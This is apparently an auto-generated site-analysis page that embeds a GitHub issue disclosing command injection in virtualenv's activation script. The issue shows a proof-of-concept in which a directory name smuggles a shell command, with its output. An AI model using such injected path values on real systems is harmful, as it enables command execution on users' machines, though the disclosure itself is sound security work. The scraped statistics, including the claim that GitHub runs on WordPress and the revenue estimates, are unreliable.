GITHUB . COM {
}
Detected CMS Systems:
- Wordpress (2 occurrences)
Title:
Command injection is possible via activation script Β· Issue #2768 Β· pypa/virtualenv
Description:
Issue This issue was originally reported to Tidelift, with disclosure negotiated with the maintainer. The activation script in virtualenv is command injectable via a crafted path: envname="...
Website Age:
17 years and 8 months (reg. 2007-10-09).
Matching Content Categories {π}
- Technology & Computing
- Video & Online Content
- Graphic Design
Content Management System {π}
What CMS is github.com built with?
Github.com is powered by WORDPRESS.
Traffic Estimate {π}
What is the average monthly size of github.com audience?
ππ Tremendous Traffic: 10M - 20M visitors per month
Based on our best estimate, this website will receive around 10,000,003 visitors per month in the current month.
check SE Ranking
check Ahrefs
check Similarweb
check Ubersuggest
check Semrush
How Does Github.com Make Money? {πΈ}
Subscription Packages {π³}
We've located a dedicated page on github.com that might include details about subscription plans or recurring payments. We identified it based on the word pricing in one of its internal links. Below, you'll find additional estimates for its monthly recurring revenues.How Much Does Github.com Make? {π°}
Subscription Packages {π³}
Prices on github.com are in US Dollars ($).
They range from $4.00/month to $21.00/month.
We estimate that the site has approximately 4,989,880 paying customers.
The estimated monthly recurring revenue (MRR) is $20,957,498.
The estimated annual recurring revenues (ARR) are $251,489,970.
Wordpress Themes and Plugins {π¨}
What WordPress theme does this site use?
It is strange but we were not able to detect any theme on the page.
What WordPress plugins does this website use?
It is strange but we were not able to detect any plugins on the page.
Keywords {π}
activation, issue, virtualenv, script, quote, strings, ycl, template, verified, mentioned, sign, added, scripts, cve, pypa, command, fix, navigation, code, pull, requests, actions, security, injection, closed, path, envname, linux, execution, downstream, bug, commit, references, ddded, comment, github, projects, milestone, footer, skip, content, menu, product, solutions, resources, open, source, enterprise, pricing, search,
Topics {βοΈ}
quote template strings comment metadata assignees activation scripts command injectable execution path activation script famous downstream projects milestone issue originally reported disclosure negotiated crafted path low-risk environment os cve-2024-53899 python 3 milestone relationships github virtualenv sign comment skip jump tidelift maintainer envname= uname mkdir $envname cd users details exploits disclosed maintainers project reference commit references version swatch-3399 bump free join conversation account development branches share
Payment Methods {π}
- Braintree
Questions {β}
- Already have an account?
Schema {πΊοΈ}
DiscussionForumPosting:
context:https://schema.org
headline:Command injection is possible via activation script
articleBody:**Issue**
This issue was originally reported to Tidelift, with disclosure negotiated with the maintainer.
The activation script in `virtualenv` is command injectable via a crafted path:
```bash
envname="';uname -a;':"
mkdir "$envname"
cd "$envname"
virtualenv .
. ./bin/activate
```
```
Linux archlinux 6.10.6-arch1-1 #1 SMP PREEMPT_DYNAMIC Mon, 19 Aug 2024 17:02:39
```
The execution path is low-risk since users clearly know what they are doing. However, it makes *downstream attack vectors* possible. More details on possible exploits of a famous downstream were disclosed to the maintainers of that project and `virtualenv`.
**Environment**
- OS: Linux
author:
url:https://github.com/y5c4l3
type:Person
name:y5c4l3
datePublished:2024-09-23T14:27:10.000Z
interactionStatistic:
type:InteractionCounter
interactionType:https://schema.org/CommentAction
userInteractionCount:0
url:https://github.com/2768/virtualenv/issues/2768
context:https://schema.org
headline:Command injection is possible via activation script
articleBody:**Issue**
This issue was originally reported to Tidelift, with disclosure negotiated with the maintainer.
The activation script in `virtualenv` is command injectable via a crafted path:
```bash
envname="';uname -a;':"
mkdir "$envname"
cd "$envname"
virtualenv .
. ./bin/activate
```
```
Linux archlinux 6.10.6-arch1-1 #1 SMP PREEMPT_DYNAMIC Mon, 19 Aug 2024 17:02:39
```
The execution path is low-risk since users clearly know what they are doing. However, it makes *downstream attack vectors* possible. More details on possible exploits of a famous downstream were disclosed to the maintainers of that project and `virtualenv`.
**Environment**
- OS: Linux
author:
url:https://github.com/y5c4l3
type:Person
name:y5c4l3
datePublished:2024-09-23T14:27:10.000Z
interactionStatistic:
type:InteractionCounter
interactionType:https://schema.org/CommentAction
userInteractionCount:0
url:https://github.com/2768/virtualenv/issues/2768
Person:
url:https://github.com/y5c4l3
name:y5c4l3
url:https://github.com/y5c4l3
name:y5c4l3
InteractionCounter:
interactionType:https://schema.org/CommentAction
userInteractionCount:0
interactionType:https://schema.org/CommentAction
userInteractionCount:0
External Links {π}(2)
Analytics and Tracking {π}
- Site Verification - Google
Libraries {π}
- Clipboard.js
- D3.js
- Lodash
Emails and Hosting {βοΈ}
Mail Servers:
- aspmx.l.google.com
- alt1.aspmx.l.google.com
- alt2.aspmx.l.google.com
- alt3.aspmx.l.google.com
- alt4.aspmx.l.google.com
Name Servers:
- dns1.p08.nsone.net
- dns2.p08.nsone.net
- dns3.p08.nsone.net
- dns4.p08.nsone.net
- ns-1283.awsdns-32.org
- ns-1707.awsdns-21.co.uk
- ns-421.awsdns-52.com
- ns-520.awsdns-01.net